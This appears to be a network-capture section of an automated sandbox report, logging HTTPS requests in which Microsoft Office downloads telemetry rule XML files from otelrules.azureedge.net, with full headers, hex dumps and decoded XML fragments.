                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:18 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:17 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 478
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                        ETag: "0x8DC582B9B233827"
                                                                                        x-ms-request-id: 691215a9-b01e-0084-78b4-42d736000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114817Z-174f7845968pf68xhC1EWRr4h800000011hg000000008ra1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:18 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        44192.168.2.44979413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:17 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:18 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:17 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                        ETag: "0x8DC582BB046B576"
                                                                                        x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114817Z-174f7845968nxc96hC1EWRspw8000000111g0000000092c2
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:18 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        45192.168.2.44979513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:17 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:18 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:18 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 400
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                        x-ms-request-id: 203bed18-201e-006e-51a9-42bbe3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114818Z-174f78459684db9fhC1EWRc7g400000001eg000000002yq0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:18 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        46192.168.2.44979313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:17 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:18 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:18 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 404
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                        x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114818Z-174f7845968frfdmhC1EWRxxbw00000011h00000000015ca
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:18 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        47192.168.2.44979613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:17 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:18 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:18 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 479
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                        x-ms-request-id: 4edae9bd-001e-0017-14b4-420c3c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114818Z-174f7845968glpgnhC1EWR7uec00000011hg0000000059et
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:18 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        48192.168.2.44979713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:19 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:20 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:20 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 425
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                        x-ms-request-id: b8a9d872-301e-003f-6bb3-42266f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114820Z-174f78459684db9fhC1EWRc7g4000000018g00000000b6ax
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:20 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        49192.168.2.44979913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:20 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:20 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:20 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 448
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                        x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114820Z-174f7845968nxc96hC1EWRspw80000001120000000007p5s
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:20 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        50192.168.2.44980013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:20 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:20 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:20 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 491
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B98B88612"
                                                                                        x-ms-request-id: d392c6ed-201e-0033-72af-42b167000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114820Z-174f78459684db9fhC1EWRc7g400000001e0000000003rvb
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:20 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        51192.168.2.44980113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:20 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:20 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:20 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 416
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                        x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114820Z-174f7845968px8v7hC1EWR08ng00000011mg0000000075fx
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:20 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        52192.168.2.44979813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:22 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:22 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:22 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 475
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                        x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114822Z-174f7845968kvnqxhC1EWRmf3g0000000n2g000000009f8z
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:22 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        53192.168.2.44980213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:22 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:22 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:22 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 479
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                        x-ms-request-id: e8f57c1b-901e-0016-2be4-41efe9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114822Z-174f7845968cdxdrhC1EWRg0en000000118g000000008eb7
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:22 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
